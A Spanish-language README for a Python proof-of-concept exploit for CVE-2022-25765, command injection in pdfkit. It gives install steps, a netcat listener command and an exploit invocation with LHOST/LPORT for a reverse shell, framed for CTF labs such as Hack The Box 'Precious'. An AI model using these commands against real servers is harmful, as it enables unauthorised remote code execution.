
Prueba de concepto en Python para CVE-2022-25765, una vulnerabilidad de inyección de comandos en pdfkit, que permite la ejecución remota de código mediante la generación de PDF manipulados.
PoC para CVE-2022-25765, que afecta a versiones vulnerables de pdfkit.
Probado con pdfkit 0.8.6.
requestscoloramaInstalar dependencias:
pip3 install -r requirements.txt
O manualmente:
pip3 install requests colorama
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>
Ejemplo: Ejecuta un listener
nc -lvnp 4242
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444
Clona el repositorio:
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765
Instala los requisitos:
pip3 install -r requirements.txt
Ejecuta el PoC contra tu objetivo de laboratorio.
CVE-2022-25765 es una vulnerabilidad de inyección de comandos en versiones vulnerables de pdfkit.
El problema está relacionado con una sanitización insuficiente de la entrada controlada por el usuario que se pasa al proceso de generación de PDF.
Este PoC fue creado principalmente para aprendizaje y entornos CTF/laboratorio.
Si buscas un lugar para probarlo, Hack The Box : Máquina: Precious.
Úsalo solo contra sistemas que poseas o para los que tengas permiso explícito de prueba.
No soy responsable del mal uso o daños causados por este proyecto.
INNOCENTx0